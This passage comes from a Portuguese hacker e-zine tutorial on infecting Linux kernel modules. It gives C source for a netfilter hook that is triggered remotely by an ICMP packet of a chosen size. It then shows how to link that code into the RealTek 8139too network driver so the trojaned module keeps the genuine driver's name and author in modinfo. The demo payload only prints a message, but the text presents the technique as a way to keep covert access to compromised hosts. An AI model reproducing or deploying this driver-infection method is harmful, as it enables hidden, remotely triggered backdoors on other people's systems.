{
    printk ( "<1> Inicializando : icmp_pkt_size:  " \
                 "%i bytes\n\n", pkt_size + P_SIZE_OFFSET);

    /* informacoes para registrar o hook do netfilter */
    nfh.hooknum  = NF_IP_LOCAL_IN;
    nfh.priority = NF_IP_PRI_FIRST;
    nfh.hook     = i_ll_hook_you;
    nfh.pf       = PF_INET;

    /* a hook e' criada */
    nf_register_hook(&nfh);

    return 0;
}

/* funcao de saida do modulo */
void __exit exit_injekt ( )
{
    /* remove a hook */   
    nf_unregister_hook( &nfh );
}

/* O que sera feito quando receber o pacote ICMP do tamanho especificado  */
int i_am_terrible( )
{
    printk ( "<1> EU SOU UMA LKM DO MAU!!!\n\n" );
    return 0;
}

/* aqui temos a hook propriamente dita */
unsigned int i_ll_hook_you (
            unsigned int hooknum,
                    struct sk_buff **skb,
                    const struct net_device *in,
                    const struct net_device *out,
                    int (*okfn)(struct sk_buff * ) ) {

    struct sk_buff *sk = *skb;
    /* verifica se o protocolo e' icmp e o tamanho do pacote e' o especificado */
    if ( sk->nh.iph->protocol == IPPROTO_ICMP &&
         sk->len == P_SIZE_OFFSET + pkt_size ) {
        /* informa que recebeu o pacote */
    //printk ( "<1> Recebido pacote de %i bytes )\n\n", sk->len );
    i_am_terrible();
    return NF_STOLEN; /* elimina o pacote! */
    }
    return NF_ACCEPT; /* retorna o pacote para ser feito o que for preciso */
}

/* informacoes do modulo */
module_init ( init_injekt );
module_exit ( exit_injekt );
MODULE_PARM ( pkt_size, "i" );
MODULE_PARM_DESC ( pkt_size, "Tamanho de pacote ICMP  ( Padrao = 50 )" );
MODULE_LICENSE ( "GPL" );
MODULE_AUTHOR  ( "tDs " );
MODULE_DESCRIPTION ( ":: keep your mind free() ::" );
<--> lkm_injection/injekt.c

–=[ Cenario Real: Infectando um Driver

Vamos utilizar como exemplo o driver 8139too.o, que normalmente esta em
“/lib/module/kernel_versao/kernel/drivers/net/8139too.o.gz”. Note que ele esta
compactado (na maioria das distribuicoes), entao nao tente injetar seu modulo
sem antes descompactar. O codigo que sera injetado e’ o que foi exposto acima,
levemente modificado (embora continue fazendo nada mais do que exibir mensagens).
Segue o codigo:

<++>lkm_injection/8139injekt.c
/*
 * Implementacao de lkm com codigo nocivo ativado remotamente,
 * atraves do recebimento de um pacote ICMP de 50 bytes, que pode
 * ser alterado passando o parametro pkt_size:
 * #insmod 8139injekt.o pkt_size=100
 * preparado para infectar driver da placa de rede realtek 8139too
 * /lib/modules/2.4.x/kernel/drivers/net/8139too.o.gz
 *
 */
#define __KERNEL__
#define MODULE

#define P_SIZE_OFFSET 28

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

int exec_injetk(void);
extern RTL8139_DRIVER_NAME;
extern rtl8139_pci_driver;
//extern pci_module_init();
unsigned int pkt_size = 22;
struct nf_hook_ops nfh;
unsigned int i_ll_hook_you(unsigned int hooknum,
                            struct sk_buff **skb,
                            const struct net_device *in,
                            const struct net_device *out,
                            int (*okfn)(struct sk_buff*));

int init_module()
{
    /* codigo do driver original */
        /* when we're a module, we always print a version message,
         * even if no 8139 board is found.
         */
#ifdef MODULE
        printk("<8> %s \n", RTL8139_DRIVER_NAME);
#endif

    nfh.hooknum  = NF_IP_LOCAL_IN;
    nfh.priority = NF_IP_PRI_FIRST;
    nfh.hook     = i_ll_hook_you;
    nfh.pf       = PF_INET;
    nf_register_hook(&nfh);

    /* codigo do driver original */
    return pci_module_init(&rtl8139_pci_driver);
}

void cleanup_module ( )
{
    /* remove a hook */
    nf_unregister_hook( &nfh );
    /* codigo do driver original */
    pci_unregister_driver(&rtl8139_pci_driver);
}
int i_am_terrible( )
{
    printk ( "<1> EU SOU UMA LKM DO MAU!!!\n\n" );
    return 0;
}
unsigned int i_ll_hook_you (
            unsigned int hooknum,
                    struct sk_buff **skb,
                    const struct net_device *in,
                    const struct net_device *out,
                    int (*okfn)(struct sk_buff * ) ) {
    struct sk_buff *sk = *skb;
    if ( sk->nh.iph->protocol == IPPROTO_ICMP &&
         sk->len == P_SIZE_OFFSET + pkt_size ) {
    i_am_terrible();
    return NF_STOLEN;
    }
    return NF_ACCEPT;
}
MODULE_PARM ( pkt_size, "i" );
MODULE_PARM_DESC ( pkt_size, "Tamanho de pacote ICMP  ( Padrao = 50 )" );
<-->lkm_injection/8139injekt.c

Compile e linke o modulo. Apos linkar, sera exibida uma mensagem de
advertencia:

    # gcc -O3 -c 8139injekt.c
    # ld -r -z muldefs 8139inject.o 8139too.o -o devil.o
    ld: Warning: size of symbol `init_module' changed from 139 in badcode.o
    to 70 in 8139too.o
    ld: Warning: size of symbol `cleanup_module' changed from 32 in badcode.o
    to 12 in 8139too.o
    # modinfo devil.o
    filename:    devil.o
    description: "RealTek RTL-8139 Fast Ethernet driver"
    author:      "Jeff Garzik "
    license:     "GPL"
    parm:        pkt_size int, description "Tamanho de pacote ICMP 
                 ( Padrao = 50 )"
    parm:        multicast_filter_limit int, description "8139too maximum number
                 of filtered multicast addresses"
    parm:        max_interrupt_work int, description "8139too maximum events
                 handled per interrupt"
    parm:        media int array (min = 1, max = 8), description "8139too: Bits
                 4+9: force full duplex, bit 5: 100Mbps"
    parm:        full_duplex int array (min = 1, max = 8), description "8139too:
                 Force full duplex for board(s) (1)"
    parm:        debug int, description "8139too bitmapped message enable number"

Observe que o modulo agora contem o parametro que definimos anteriormen-
te, em nosso modulo. Apos carregar o modulo, o hook do netfilter que foi criada
estara disponivel e, para ativar a nossa funcao “i_am_terrible”, basta um
“ping -s 22 ip.da.vitima”. Note que o PING nao vai retornar resposta, visto que
o pacote sera descartado no hook. Entretanto, funcionara perfeitamente. Ultima
observacao: Nao tente fazer isso com um driver de um dispositivo nao presente
na maquina, os resultados podem ser desastrosos ( panic() ).

Muito pode ser feito com infeccao de modulo, embora pessoas com maior
conhecimento normalmente utilizam-se de outros meios para manter acesso em
hosts previamente dominados. A utilizacao de modulos para esse fim pode ser
bastante efetiva e ao mesmo tempo muito simples de ser implemtentada.

–=[ Agradecimentos e Links/Referencias

Pessoal da scene brasileira toda, em especial ao pessoal que converso
com maior frequencia. Voces sabem quem sao voces.
Informacao e’ simples de se adquirir, internet esta cheia disso. Basta saber
procurar.

http://www.motdlabs.org
http://tds.motdlabs.org
http://gcc.gnu.org/onlinedocs/gcc-3.4.4/gcc/
http://www.gnu.org/software/binutils/manual/ld-2.9.1/html_chapter/ld_toc.html
http://www.netfilter.org/

_EOF_

Fonte